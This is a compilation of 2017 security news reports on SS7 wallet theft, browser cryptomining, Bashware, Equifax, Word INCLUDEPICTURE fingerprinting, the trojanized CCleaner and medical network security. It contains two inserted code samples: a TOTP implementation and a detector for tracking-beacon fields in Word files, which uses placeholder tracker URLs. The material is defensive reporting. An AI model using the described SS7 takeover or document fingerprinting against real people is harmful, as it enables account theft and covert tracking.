Cuomo makes it clear that he hopes that other states will follow with their own similar regulations on credit companies. This puts New York state in direct opposition to the perceived federal preferences of the Trump administration -- which would prefer to ease regulatory restrictions on business. Cuomo believes that tighter regulations are required to protect consumers, rather than looser regulations to promote business.

The new regulation will likely be subject to a public comment period. However, under the current proposal, credit reporting agencies will be required to register with the DFS by February 1, 2018, and annually thereafter. The DFS 500 cybersecurity regulation will need to be implemented on a staggered basis, but the credit companies will need to be in full compliance by October 4, 2019.


Researchers demonstrate how to steal Bitcoin by exploiting SS7 issues
19.9.2017 securityaffairs  Mobil

Researchers have exploited security weaknesses in the SS7 protocol to break into a Gmail account, take control of a bitcoin wallet and steal funds.
In June 2016, researchers with Positive Technologies demonstrated that it is possible to hack Facebook accounts, knowing only the phone number, by exploiting a flaw in the SS7 protocol. The technique bypasses any security measure implemented by the social network giant.

SS7 is a set of signalling protocols that telephone networks have used since the late 1970s to set up calls and exchange routing information between carriers; it was designed for a closed network of trusted operators, not for a world in which access to it can be bought or stolen.

The security issue in Signaling System 7 could be exploited by criminals, terrorists and intelligence agencies to spy on communications. The SS7 protocol lets cell phone carriers collect location data about a user's device from cell towers and share it with other carriers, which means that by exploiting Signaling System 7 a carrier can discover a subscriber's position wherever they are.

The team of researchers from Positive Technologies is the same that demonstrated how to hack WhatsApp and Telegram accounts by leveraging on the SS7 protocol.

The attack method devised by the experts from Positive Technologies works against any service that relies on SMS to verify the user accounts, including Gmail and Twitter.

More than a year later, the situation is unchanged: flaws in the Signaling System 7 protocol can be exploited to intercept one-time two-factor authentication tokens sent by SMS.

If an attacker can reach the SS7 equipment, they can hijack messages and calls. Such attacks can be carried out by compromising the SS7 equipment of a telco or with the help of an insider; the attacker needs only the target's phone number.

Back to the present: researchers at Positive Technologies obtained access to a telco’s Signaling System 7 platform, with permission, for research purposes.

This time the researchers demonstrated that it is possible to control a victim’s Bitcoin wallet by exploiting SS7 issues.

SS7 hack cyber heist

The experts explained that just knowing the first name, last name, and phone number of the victims was enough to get their email address from Google’s find-a-person service and hack a wallet in Coinbase.

The experts first obtained the target Gmail address and cellphone number, then requested a password reset for the webmail account, which involved sending an authentication token to the cellphone number.

Positive exploited SS7 issues to intercept the authentication token and gain access to the victim’s Gmail account, then they reset the password to the user’s Coinbase wallet.

At this point, they accessed the Coinbase account and stole the funds; a video PoC is available at the following URL:

Attacks exploiting SS7 vulnerabilities have already been reported in the wild: earlier this year, cybercriminals targeted online bank accounts in Germany and stole their funds. O2-Telefonica in Germany confirmed to the newspaper Süddeutsche Zeitung that some of its customers suffered cyber heists exploiting the SS7 flaws.

“Exploiting SS7-specific features is one of several existing ways to intercept SMS,” said Dmitry Kurbatov, head of the telecommunications security department at Positive Technologies.

“Unfortunately, it is still impossible to opt out of using SMS for sending one-time passwords. It is the most universal and convenient two-factor authentication technology. All telecom operators should analyze vulnerabilities and systematically improve the subscriber security level.”

Experts highlighted that sensitive accounts that use a phone number for authentication are at risk of SS7 hijacks; it is more secure to use two-factor authentication based on a mobile app (e.g. Google Authenticator) or a hardware key fob.
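That last recommendation can be made concrete. The following Python code is an added example, not part of the Security Affairs article or of Positive Technologies' research: it implements the TOTP scheme (RFC 6238, built on HOTP from RFC 4226) that apps such as Google Authenticator use, so each code is derived on the device from a shared secret and the clock, and no SMS ever crosses the carrier network for an SS7 attacker to intercept. The secret and timestamps used below are the RFCs' published test values; the account and issuer names are made up.

```python
import base64
import hashlib
import hmac
import secrets
import struct
import time
from urllib.parse import quote


def hotp(key: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """HOTP (RFC 4226): HMAC over the 8-byte big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(key, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key: bytes, for_time=None, step: int = 30, digits: int = 6, algo=hashlib.sha1) -> str:
    """TOTP (RFC 6238): HOTP with counter = floor(unix_time / step). Nothing leaves the device."""
    if for_time is None:
        for_time = time.time()
    return hotp(key, int(for_time) // step, digits, algo)


def verify_totp(key: bytes, submitted: str, for_time=None, window: int = 1,
                step: int = 30, digits: int = 6) -> bool:
    """Server-side check tolerating +/-window steps of clock drift; compares in constant time.
    A real server also records the last accepted counter so a code cannot be replayed."""
    if for_time is None:
        for_time = time.time()
    counter = int(for_time) // step
    ok = False
    for delta in range(-window, window + 1):
        ok |= hmac.compare_digest(hotp(key, counter + delta, digits), submitted)
    return ok


def new_secret(nbytes: int = 20) -> bytes:
    """Per-enrolment random secret; 160 bits is the RFC 4226 recommendation for SHA-1."""
    return secrets.token_bytes(nbytes)


def provisioning_uri(secret: bytes, account: str, issuer: str, digits: int = 6, step: int = 30) -> str:
    """otpauth:// Key Uri Format that authenticator apps read from the enrolment QR code."""
    b32 = base64.b32encode(secret).decode().rstrip("=")
    return (f"otpauth://totp/{quote(issuer)}:{quote(account)}?secret={b32}"
            f"&issuer={quote(issuer)}&algorithm=SHA1&digits={digits}&period={step}")


RFC_SECRET = b"12345678901234567890"  # shared test secret from RFC 4226 / RFC 6238

if __name__ == "__main__":
    print(hotp(RFC_SECRET, 0))             # 755224, RFC 4226 vector for counter 0
    print(totp(RFC_SECRET, 59, digits=8))  # 94287082, RFC 6238 SHA-1 vector for T=59
    print(provisioning_uri(new_secret(), "alice@example.invalid", "ExampleBank"))
```

The security of the scheme rests on the secret being exchanged once, out of band (the QR code at enrolment), and never again; a service that falls back to SMS for account recovery reintroduces exactly the SS7 exposure the researchers demonstrated, so the recovery path deserves the same scrutiny as the login path.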


Was Torrent Site The Pirate Bay Being Sneaky or Creative By Tricking Visitors Into Monero Mining
19.9.2017 securityaffairs  Security

Users noticed that a cryptocurrency miner surfaced on The Pirate Bay, the world’s largest torrent site, for a day over the weekend.
Pop quiz: would you rather A) see ad banners displayed at the top of the website, or B) mine Monero cryptocurrency when you visit a website? Judging by the number of downloads for ad blocking browser extensions, no one likes banner ads. But if you ask The Pirate Bay this week, they will probably say the same thing about secretive Monero mining.

In August, security researchers at Netskope identified a malvertising campaign that downloaded the Zminer coin-miner and then used victims’ computers to mine Monero and Zcash cryptocurrencies for the benefit of the bad actors.

According to Threat Post, “Netskope provided details on two separate operations that have netted 101 Monero, or $8,300 USD, and 44 Zcash, or $10,100 USD so far. Zminer uses Monero on 32-bit Windows systems, and Zcash on 64-bit.”

The Pirate Bay

The challenge with most cryptocurrency mining is that the cost of operating the mining machines (e.g. electricity) eats away at much of the profit potential. But for the bad actors, victims pay the operating costs while the profits are reaped by the ones poisoning the banner ad system. When there are no costs, mining cryptocurrencies can be lucrative.

Last week a very observant Redditor Intertubes_Unclogger noticed that his CPU threads spiked to 80-85% visiting some pages on the very popular Torrent search site, The Pirate Bay (TPB). It is very unlikely that simple web browsing would cause such a spike so it was apparent something unexpected was going on. After some trial and error the Redditor determined that the ScriptSafe Chrome extension was preventing the process that caused the CPU spike. The Reddit community participating in solving the mystery guessed that TPB may have been unknowingly involved in a “shady bitcoin mining operation.” It turns out they were very close to the truth.

TPB was indeed serving up Monero mining code on some of its pages, but it was not the work of an outsider: the site had put it there itself, as the official TPB blog explained.

“This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running,” a site admin posted on The Pirate Bay’s blog, “Let us know what you think in the comments. Do you want ads or do you want to give away a few of your CPU cycles every time you visit the site?”

It turns out that TPB was experimenting with Coin Hive which is described as “a JavaScript miner for the Monero Blockchain that you can embed in your website. Your users run the miner directly in their Browser and mine XMR for you in turn for an ad-free experience, in-game currency or whatever incentives you can come up with.” Coin Hive themselves recommend that websites notify their users rather than sneakily stealing CPU cycles as TPB did. An admin at TPB suggested that there was a mistake made with the initial install as the miner was only expected to use 20-30% of the visitors’ CPU. This sounds a lot like “we didn’t think anyone would notice.”

At the end of the day, the general consensus in the /r/thepiratebay subreddit seems to be supportive of TPB’s attempts to fund their activities through means other than banner ads. And for users that would prefer to choose whether they are mining for someone else’s benefit, there are JavaScript and ad blocker extensions for the web browsers. This is evidence of one more reason why you need to control what is running in your browser.


Cybercriminals can easily bypass antivirus software. 400 million computers at risk

19.9.2017 Novinky/Bezpečnost Viry
Security experts at Check Point have uncovered a new way for computer criminals to bypass the protection of computers running Windows 10 relatively easily. The method does not exploit any security hole; it abuses one of the operating system's own features.
“The technique, called Bashware, uses a new Windows 10 feature called "Subsystem for Linux" (WSL), which until recently was only in beta but is now a fully supported Windows feature,” said Petr Kadrmas, security specialist at Check Point.

This is the popular Linux shell (Bash), made available to Windows users, which allows Linux executables to run natively on Windows. The hybrid concept thus lets Linux and Windows be combined on the same machine.

Existing security products for Windows 10, however, are still not adapted to monitoring the processes of Linux executables. “This opens a new door for cybercriminals to run malicious code unnoticed and use WSL to hide from security products that have not yet implemented the corresponding detection mechanisms,” Kadrmas stressed.

Hundreds of millions of PCs at risk
“Check Point tested this technique on most of the leading antivirus and security products, and the malware was not detected. Bashware can thus potentially affect any of the 400 million computers currently running Windows 10,” the security expert noted.

By the nature of the problem it is not Microsoft itself that can respond to the threat, but the makers of the individual antivirus products. These must be able to work in both the Windows and the Linux environment; otherwise users are exposed to the risk.


Equifax Cybersecurity Failings Revealed Following Breach
19.9.2017 securityweek CyberCrime
Shortcomings revealed by researchers and cybersecurity firms following the massive data breach suffered by Equifax show that a successful hacker attack on the credit reporting agency’s systems was inevitable.

Some members of the industry pointed out last week that the company’s Chief Security Officer (CSO) Susan Mauldin was a music major with no educational background in cybersecurity or technology. Mauldin and Chief Information Officer David Webb retired from the company on Friday.

Others dug up old vulnerability reports that the firm had still not addressed and noted the lack of even basic protections on the company’s website. Even the website set up by Equifax to provide information about the breach was riddled with security holes and some services flagged it as a phishing site.

The organization does not have a vulnerability disclosure program that would allow and encourage security experts to responsibly report the flaws they find.

The Apache Struts 2 vulnerability leveraged by cybercriminals to breach Equifax systems had been known and exploited for roughly two months before the attack on the company. Equifax said its security team knew about the flaw and is now trying to determine why an online dispute portal, which served as the initial point of entry, remained unpatched.

Experts pointed out that the Apache Struts flaw is not easy to fix, especially if you have many systems that need patching. However, they believe the problem can be addressed with modern security solutions.

Comodo discovered that more than 388 records of Equifax users and employees are up for sale on the dark web. The information, which includes usernames, passwords and login URLs, was apparently stolen using Pony malware. The security firm pointed out that some Equifax credentials were also exposed in third-party incidents, including the massive LinkedIn and Dropbox breaches.

“From third-party (non-company system) sources, we uncovered that Equifax’s chief privacy officer, CIO, VP of PR and VP of Sales, used all lowercase letters, no special symbols, and easily guessable words like spouses’ names, city names, and even combinations of initials and birth year. This reveals that they didn’t follow basic security best practices and were lacking a complex password requirement,” Comodo said in a blog post.

Another security incident related to the company was brought to light by security blogger Brian Krebs, who was informed by researchers that an Equifax Argentina employee portal exposed 14,000 records, including credentials and consumer complaints.

The breach, the manner in which the company investigated the incident, and some of these security failings have led to a significant drop in Equifax shares. Before the hack was disclosed, Equifax stock was worth roughly $140, but it has now dropped to $92, and financial experts believe it could plunge as low as $50. The incident has already cost the company nearly $10 billion in market value.


New Attack Fingerprints Users Using Word Documents
19.9.2017 securityweek Attack
A newly detailed attack method leverages Microsoft Word documents to gather information on users, but doesn’t use macros, exploits or any other active content to do so, security researchers at Kaspersky Lab have discovered.

Distributed as attachments to phishing emails, these documents were in OLE2 format and contained links to PHP scripts located on third-party web resources. As soon as a user opens the files in Microsoft Office, the application accesses one of the links, resulting in the attackers receiving information about the software installed on the computer.

One analyzed document contained tips on how to use Google search more effectively and did not appear suspicious, especially since it contained no active content, embedded Flash objects or PE files. However, as soon as a user opened the document, Word sent a GET request to an internal link.

“This code effectively sent information about the software installed on the victim machine to the attackers, including info about which version of Microsoft Office was installed,” the security researchers say.

The security researchers discovered that the document used an undocumented Word feature built on an INCLUDEPICTURE field. This field indicates that an image is attached to certain characters in the text, but the attackers used it to include a suspicious link, although not the URL that Word actually addressed.

While the text in a Word document is stored in a raw state, so-called fields are used to indicate how portions of the text should be presented. Specific bytes mark where the raw text ends and the INCLUDEPICTURE field begins, where the field's separator falls, and where the field ends.

In the analyzed document, a byte between the separator and the end indicates that an image should be inserted at that point. After locating the byte sequence with the picture placeholder, the researchers concluded at which offset the image should be located in the Data stream. The offset turned out to be a Form, and its name was another suspicious link.

Because the link was only an object name, it wasn’t used in any way, but a combination of flags was used to indicate that additional data should be attached to the form. This data, the researchers say, “constitutes a URL that leads to the actual content of the form.”

A ‘do not save’ flag prevented the content from being saved to the actual document when it is opened.

The issue, the Kaspersky researchers say, is that “Microsoft Office documentation provides basically no description of the INCLUDEPICTURE field.” They couldn’t find information on what the data that follows the separator may mean, and how it should be interpreted, which was the main problem when trying to understand how the document was following the URL.

“This is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted attacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry out targeted attacks,” Kaspersky says.

This Office feature exists in Word for Windows, Microsoft Office for iOS, and Microsoft Office for Android, the researchers discovered. However, LibreOffice and OpenOffice do not have it, meaning that Word documents opened with either of these applications won’t call the malicious link.


Hackers exploit an undocumented Word feature for user fingerprinting
19.9.2017 securityaffairs Exploit

Kaspersky researchers discovered a new attack technique leveraging an undocumented Word feature to gather information on users.
Kaspersky researchers discovered a new attack technique leveraging Microsoft Word documents to gather information on users. The technique is innovative because it doesn’t use active content such as macros or exploits; instead it abuses an undocumented Word feature to fingerprint users.

The attackers sent phishing emails with Word documents in OLE2 format that contained links to PHP scripts hosted on third-party web resources. Once the user opened the files in Microsoft Office, the application accessed one of the links, and the attackers received information about the software installed on the target machine.

“They were in OLE2 format and contained no macros, exploits or any other active content. However, a close inspection revealed that they contained several links to PHP scripts located on third-party web resources.” reads the analysis published by Kaspersky Lab. “When we attempted to open these files in Microsoft Word, we found that the application addressed one of the links. As a result, the attackers received information about the software installed on the computer.”

One of the documents analyzed by the researchers contained tips on how to use Google search more effectively; it contained no active content: no VBA macros, embedded Flash objects or PE files. Once opened, Word sent a GET request to an internal link.

“This code effectively sent information about the software installed on the victim machine to the attackers, including info about which version of Microsoft Office was installed,” continues the analysis.

The researchers discovered that the document used an undocumented Word feature, they noticed the presence of an INCLUDEPICTURE field that indicates that an image is attached to certain characters in the text.

The experts highlighted that Microsoft Office documentation provides basically no description of the INCLUDEPICTURE field.

The attackers used the INCLUDEPICTURE field to include a suspicious link there, although not the URL addressed by Word.

The text in Word documents is stored in the WordDocument stream in a ‘raw’ state that contains no formatting except for so-called fields. The fields are used to instruct Word that a certain segment of the text must be presented in a specific way. The field INCLUDEPICTURE indicates that an image is attached to certain characters in the text.

The experts identified the following characters inside the document:

Begin = 0x13
Sep = 0x14
End = 0x15
Field = <Begin> *<Field> [Sep] *<Field> <End>

undocumented word feature

A byte between the separator (Sep) and the end (End) tells Word that an image should be inserted at that point. The experts first located the byte sequence with the picture placeholder, then worked out at which offset the image should be located in the Data stream.

“So, we go to offset 0 in the Data stream and see that the so-called SHAPEFILE form is located there:

undocumented Word feature fingerprint

Forms are described in a different Microsoft document: [MS-ODRAW]: Office Drawing Binary File Format. This form has a name and, in this case, it is another suspicious link:” continues the analysis.

Experts noticed that a combination of flags was used to indicate that additional data should be attached to the form. According to Kaspersky, this data constitutes a URL that leads to the actual content of the form.

“This indicates that additional data should be attached to the form (it is highlighted in yellow in the screenshot), and that this data constitutes a URL that leads to the actual content of the form. Also, there is a ‘do not save’ flag, which prevents this content from being saved to the actual document when it is opened.” continues the analysis.
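The field structure described in this analysis and in the SecurityWeek write-up above can be walked with a small parser. The following Python code is an added example, not Kaspersky's tooling: it scans a text stream for the Begin (0x13), Sep (0x14) and End (0x15) characters using the grammar quoted above, handles nested fields, and flags INCLUDEPICTURE fields that either carry an external URL in the field code or consist only of the picture placeholder (0x01), which is the case the researchers describe, where the real URL lives in the shape stored in the Data stream. The sample text, the URLs in it and the `\d` switch (Word's documented "do not store graphics data with the document" switch, which matches the 'do not save' behaviour described above) are constructed; extracting the WordDocument stream from the OLE2 container and reading the Data stream are outside this example.

```python
import re
from dataclasses import dataclass, field as dc_field
from typing import List, Optional

BEGIN, SEP, END = "\x13", "\x14", "\x15"  # the Begin/Sep/End characters quoted in the article
PICTURE_PLACEHOLDER = "\x01"              # result text meaning "an image goes here"
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class Field:
    instruction: str                      # between Begin and Sep: the field code, e.g. ' INCLUDEPICTURE "..." \d '
    result: str                           # between Sep and End: what Word last displayed for the field
    children: List["Field"] = dc_field(default_factory=list)

    @property
    def kind(self) -> str:
        parts = self.instruction.split()
        return parts[0].upper() if parts else ""


def parse_fields(text: str) -> List[Field]:
    """Field = <Begin> *<Field> [Sep] *<Field> <End>, parsed with an explicit stack so fields may nest."""
    root = Field(instruction="", result="")
    stack, in_result = [root], [False]
    for ch in text:
        cur = stack[-1]
        if ch == BEGIN:
            child = Field(instruction="", result="")
            cur.children.append(child)
            stack.append(child)
            in_result.append(False)
        elif ch == SEP and len(stack) > 1:
            in_result[-1] = True
        elif ch == END and len(stack) > 1:
            stack.pop()
            in_result.pop()
        elif in_result[-1]:
            cur.result += ch
        else:
            cur.instruction += ch
    if len(stack) > 1:
        raise ValueError("unterminated field: missing End byte")
    return root.children


def walk(fields: List[Field]):
    for f in fields:
        yield f
        yield from walk(f.children)


@dataclass
class Finding:
    kind: str
    reason: str
    url: Optional[str]


def suspicious_fields(text: str) -> List[Finding]:
    """Report INCLUDEPICTURE fields that would make Word fetch something when the file is opened."""
    findings = []
    for f in walk(parse_fields(text)):
        if f.kind != "INCLUDEPICTURE":
            continue
        urls = URL_RE.findall(f.instruction)
        do_not_save = re.search(r"\\d\b", f.instruction) is not None
        if urls:
            reason = "external picture URL in field code" + (" (\\d: not cached in the file)" if do_not_save else "")
            findings.append(Finding(f.kind, reason, urls[0]))
        elif f.result == PICTURE_PLACEHOLDER:
            findings.append(Finding(f.kind, "placeholder only: inspect the shape in the Data stream", None))
    return findings


# Constructed sample text stream (not from the analyzed document); URLs are placeholders.
SAMPLE_TEXT = (
    "Ten tips for searching Google more effectively. "
    + BEGIN + ' INCLUDEPICTURE "http://tracker.example/pixel.php" \\d ' + SEP + PICTURE_PLACEHOLDER + END
    + " Tip 1: use quotes. "
    + BEGIN + " IF " + BEGIN + ' INCLUDEPICTURE "http://tracker.example/nested.php" ' + SEP + PICTURE_PLACEHOLDER + END
    + ' = "" "a" "b" ' + SEP + "b" + END
    + " Updated on " + BEGIN + " DATE " + SEP + "19.9.2017" + END
    + " " + BEGIN + " INCLUDEPICTURE \\d " + SEP + PICTURE_PLACEHOLDER + END  # URL would sit in the Data stream
)

if __name__ == "__main__":
    for finding in suspicious_fields(SAMPLE_TEXT):
        print(finding)
```

The nested IF case matters in practice: a field hidden inside another field's code is still parsed and evaluated by Word, so a scanner that only looks at top-level fields misses it. The last sample field is the shape of the document Kaspersky describes, where nothing in the text stream reveals the destination and the Data stream has to be read to recover the form name and the attached URL.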

The attackers devised this complex technique to fingerprint users opening the Word documents.

“This is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted attacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry out targeted attacks,” Kaspersky says.

According to Kaspersky, the Office feature exists in Word for Windows, Microsoft Office for iOS, and Microsoft Office for Android. LibreOffice and OpenOffice do not implement this feature.


CCleaner supply chain compromised to distribute malware
19.9.2017 securityaffairs Virus

CCleaner app version 5.33 that was available for download between August 15 and September 12 was modified to include the Floxif malware
Bad news for the users of the CCleaner app, according to researchers with Cisco Talos, version 5.33 that was available for download between August 15 and September 12 was modified to include the Floxif malware.

The Floxif malware downloader gathers information about infected systems (computer name, a list of installed applications, a list of running processes, MAC addresses for the first three network interfaces) and downloads and runs other malicious binaries.

The variant of Floxif malware spread by the crooks only works on 32-bit systems and victims must use an administrator account.

“For a period of time, the legitimate signed version of CCleaner 5.33 being distributed by Avast also contained a multi-stage malware payload that rode on top of the installation of CCleaner.” reads the analysis published by Cisco Talos. “CCleaner boasted over 2 billion total downloads by November of 2016 with a growth rate of 5 million additional users per week. Given the potential damage that could be caused by a network of infected computers even a tiny fraction of this size we decided to move quickly” the analysis continues.

Cisco Talos experts spotted the trojanized CCleaner app last week while beta testing a new exploit detection solution: they noticed that a version of CCleaner 5.33 was connecting to suspicious domains.

Further investigation allowed Talos to discover that the tainted CCleaner version was deployed on the official website and was signed using a valid digital certificate.

Researchers speculate that attackers compromised Avast’s supply chain to spread the Floxif trojan.

It is possible that attackers compromised the company system, but experts haven’t excluded that the incident was an insider’s job.

“Given the presence of this compilation artifact as well as the fact that the binary was digitally signed using a valid certificate issued to the software developer, it is likely that an external attacker compromised a portion of their development or build environment and leveraged that access to insert malware into the CCleaner build that was released and hosted by the organization. It is also possible that an insider with access to either the development or build environments within the organization intentionally included the malicious code or could have had an account (or similar) compromised which allowed an attacker to include the code.” continues Talos.

Recall that Avast owns Piriform, the developer of CCleaner; the antivirus firm bought it in July, a month before the tainted CCleaner 5.33 version was released.

On September 13, Piriform released a new version of CCleaner (5.34) and CCleaner Cloud version 1.07.3191 that do not contain the malware.

“Based on further analysis, we found that the 5.33.6162 version of CCleaner and the 1.07.3191 version of CCleaner Cloud was illegally modified before it was released to the public, and we started an investigation process. We also immediately contacted law enforcement units and worked with them on resolving the issue.” reads a blog post published by Piriform.

The Floxif trojan uses a domain generation algorithm (DGA) to produce the domain names used for its command and control (C&C) servers. DNS data for the domain names used in August and September shows that thousands of users were infected.

CCleaner DNS requests August-September

Once informed of the incident Avast took down the C&C servers and observed a spike in the number of infected hosts making DNS queries for a backup domain.


It is important to highlight that updating to version 5.34 does not solve the situation on its own, because the malware will still be present on already infected hosts.


Warning: CCleaner Hacked to Distribute Malware; Over 2.3 Million Users Infected
18.9.2017 thehackernews Virus

If you have downloaded or updated the CCleaner application on your computer between August 15 and September 12 of this year from its official website, then pay attention—your computer has been compromised.
CCleaner is a popular application with over 2 billion downloads, created by Piriform and recently acquired by Avast, that allows users to clean up their system to optimize and enhance performance.
Security researchers from Cisco Talos discovered that the download servers used by Avast to let users download the application were compromised by some unknown hackers, who replaced the original version of the software with the malicious one and distributed it to millions of users for around a month.
This incident is yet another example of a supply chain attack. Earlier this year, update servers of a Ukrainian company called MeDoc were also compromised in the same way to distribute the Petya ransomware, which wreaked havoc worldwide.
Avast and Piriform have both confirmed that the Windows 32-bit version of CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 were affected by the malware.
Detected on 13 September, the malicious version of CCleaner contains a multi-stage malware payload that steals data from infected computers and sends it to attacker's remote command-and-control servers.

Moreover, the unknown hackers signed the malicious installation executable (v5.33) using a valid digital signature issued to Piriform by Symantec and used a Domain Generation Algorithm (DGA), so that if the attackers' server went down, the DGA could generate new domains to receive and send stolen information.
"All of the collected information was encrypted and encoded by base64 with a custom alphabet," says Paul Yung, V.P. of Products at Piriform. "The encoded information was subsequently submitted to an external IP address 216.126.x.x (this address was hardcoded in the payload, and we have intentionally masked its last two octets here) via a HTTPS POST request."
The malicious software was programmed to collect a large number of user data, including:
Computer name
List of installed software, including Windows updates
List of all running processes
IP and MAC addresses
Additional information like whether the process is running with admin privileges and whether it is a 64-bit system.
How to Remove Malware From Your PC
According to the Talos researchers, around 5 million people download CCleaner (or Crap Cleaner) each week, which indicates that more than 20 million people could have been infected with the malicious version of the app.
"The impact of this attack could be severe given the extremely high number of systems possibly affected. CCleaner claims to have over 2 billion downloads worldwide as of November 2016 and is reportedly adding new users at a rate of 5 million a week," Talos said.
However, Piriform estimated that up to 3 percent of its users (up to 2.27 million people) were affected by the malicious installation.
Affected users are strongly recommended to update their CCleaner software to version 5.34 or higher, in order to protect their computers from being compromised. The latest version is available for download here.


Windows 10 Users to Get Improved Privacy Controls
18.9.2017 securityweek  Privacy
The upcoming Windows 10 Fall Creators Update will bring enhanced privacy controls to both consumers and commercial customers, Microsoft says.

After being heavily criticized for the large amount of user data collected from Windows 10 machines, Microsoft has decided to implement a series of data protections to silence concerns, and has been successful in its attempt.

Released earlier this year, the Windows 10 Creators Update provided users with increased control over privacy settings and updates, and also allowed them to choose how much usage data they like to share with Microsoft. In July, the company announced that it would force users into reviewing their privacy settings and installing the latest feature update, namely Windows 10 Creators Update.

In addition, Microsoft also improved transparency on the diagnostic data collected from Windows 10 machines. Now, the company is looking into providing users with increased access to information and more control over the collected information, Marisa Rogers, Windows and Devices Group Privacy Officer, reveals.

Consumers will enjoy simplified access to information about features and the data collection around those features, courtesy of two privacy changes made to the setup process.

Starting with Windows 10 Fall Creators Update, set to arrive on October 17, users have direct access to the Privacy Statement within the setup process and can also use the Learn More page on the privacy settings screen to jump to specific settings for location, speech recognition, diagnostics, tailored experiences, and ads while choosing their privacy settings.

“You no longer need to sift through the privacy statement if you only want to read about a specific feature, simply click the Learn More button for easy access,” Rogers explained in a blog post.

Moreover, users will also have increased transparency and control over which applications can access their information. Similar to permission prompts for the use of location data when launching a map or other location-aware applications, permission requests will pop up when applications installed through the Windows Store will need access to various device capabilities.

“You will be prompted to provide permission before an app can access key device capabilities or information such as your camera, microphone, contacts, and calendar, among others. This way you can choose which apps can access information from specific features on your device,” Rogers explains.

The app permission prompts will only appear for apps installed after the Fall Creators Update. However, users will be able to review and manage existing app permissions by selecting Start > Settings > Privacy.

In addition to these changes, enterprise customers will also have access to a new setting that limits diagnostic data to the minimum required for Windows Analytics, a service that allows admins to decrease IT costs by gaining insights – through Windows Diagnostics – into the computers running Windows 10 in their organizations.


Connected Medicine and Its Diagnosis
18.9.2017 Kaspersky  Safety

Medical data is slowly but surely migrating from paper mediums to the digital infrastructure of medical institutions. Today, the data is “scattered” across databases, portals, medical equipment, etc. In some cases, the security of the network infrastructure of such organizations is neglected, and resources that process medical information are accessible from outside sources.

The results obtained during the research we discussed in a previous article called for a more detailed analysis of the security problem, this time from within medical institutions (with the consent of their owners, of course). The analysis allowed us to work through the mistakes found and give a series of recommendations for IT experts who service medical infrastructure.

Incorrect diagnosis is the first step to a fatal outcome
Providing data security in medicine is an issue that is more serious than it may seem at first glance. The most obvious scenario, which is the theft and reselling of medical data on the black market, does not seem as scary as the possibility of diagnostic data being modified by evildoers. Regardless of the goals of evildoers (extorting money from hospital owners or attacks targeted at specific patients), nothing good comes to patients as a result: after receiving incorrect data, doctors may prescribe the wrong course of treatment. Even if data substitution is detected in time, the normal operation of the medical institution may be disrupted, prompting the need to recheck all of the information stored on compromised equipment.

According to a report by the Centers for Disease Control and Prevention (CDC), the third leading cause of death in the USA comes from medical errors. Establishing a correct diagnosis depends on, aside from the qualification of a patient’s doctor, the correctness of data that is received from medical devices and stored on medical servers. This means that the resources for connected medicine produce an increased attraction for evildoers.

What is connected medicine?
This term refers to a large number of workstations, servers, and dedicated medical equipment that are connected to the network of a medical institution (a simplified model is shown in the figure below).
 

The network topology of connected medicine

Contemporary diagnostic devices can be connected to the LAN of an organization or to workstations through, for example, USB connections. Medical equipment quite often processes data (for example, a patient’s photographs) in DICOM format, which is an industry standard for images and documents. In order to store them and provide access to them from outside, PACSs (Picture Archiving and Communication Systems) are used, which can also be of interest to evildoers.

Recommendation #1: remove all nodes that process medical data from public access
It should be obvious that medical information should remain exclusively within the LAN of an institution. Currently, however, more than one thousand DICOM devices are publicly accessible, which is confirmed by statistics obtained using the Shodan search engine.
 

The geographical spread of DICOM devices (according to data from the Shodan search engine)

Generally, all types of PACS servers, which store information valuable to evildoers, are found publicly accessible. PACSs should be placed within the corporate perimeter, insulated from unauthorized use by third parties, and periodically backed up.

Recommendation #2: assign counter-intuitive names to resources
Even during the reconnaissance phase, attackers can obtain data that is important for an attack. So, for example, when enumerating available resources, they can find out the names of internal resources (servers and workstations) and thus determine which network nodes are useful to them and which ones are not.
 

Data about resources on the LAN of an organization that was obtained using open sources

To cite “interesting” resources as an example, let’s note database servers and other locations where medical information is collected. Aside from that, attackers may use obvious resource names to identify workstations with connected medical equipment.
 

An example of poor naming of internal resources on the LAN of a medical institution, which shows attackers where valuable data is kept

In order to make things harder for evildoers, obvious naming practices should be avoided. There are recommendations out there on how to name workstations and servers that have been compiled by competent organizations. We suggest that you take a look.

Denis Makrushin (@difezza), Mar 16, 2017: “Yes, naming policy can provide useful information about your infrastructure. Must read for medical facilities: https://www.rfc-editor.org/rfc/rfc8117.txt”

Recommendation #3: periodically update your installed software and remove unwanted applications
Evildoers may find many potential entry points when analyzing installed software on network nodes that process valuable information. In the example below, a workstation has several applications installed that have nothing to do with medicine (the W32.Mydoom worm and the Half-Life Engine game server). Additionally, that list has a series of applications that have critical vulnerabilities with published exploits.
 

An example of software installed on a workstation with connected medical equipment

One more example of such a careless approach is the installation of third-party software on a server that is responsible for the operation of the institution’s web portal, which allows doctors and patients to remotely access medical data.
 

A server with a tool for viewing DICOM images that has third-party software as well

In order to rule out the possibility of data access via third-party software, installed applications should be regularly inspected and updated. There should be no extra software on workstations with connected medical equipment.
 

An example of a vulnerable medical web portal that contains critical vulnerabilities exposing medical data.

Recommendation #4: refrain from connecting expensive equipment to the main LAN of your organization
Medical devices used to help perform diagnoses and operations are very often expensive in terms of maintenance (for example, calibration), which requires significant financial investments from the owner.

An evildoer who gains access to equipment or a workstation with a connected device may:

exfiltrate medical data directly from the device;
spoof diagnostic information;
reset equipment settings, which will lead to unreliable data output or temporary incapacitation.
In order to gain access to data that is produced by the device, an evildoer only has to search for specific software.
 

An evildoer may isolate medical applications on the list of installed software on a workstation and modify operation parameters for medical equipment

To prevent unauthorized access to equipment, it is necessary to isolate all of the medical devices and workstations connected to them as a separate LAN segment and provide a means to carefully monitor events occurring in that segment (see also recommendation #5).

Recommendation #5: provide timely detection of malicious activity on your LAN
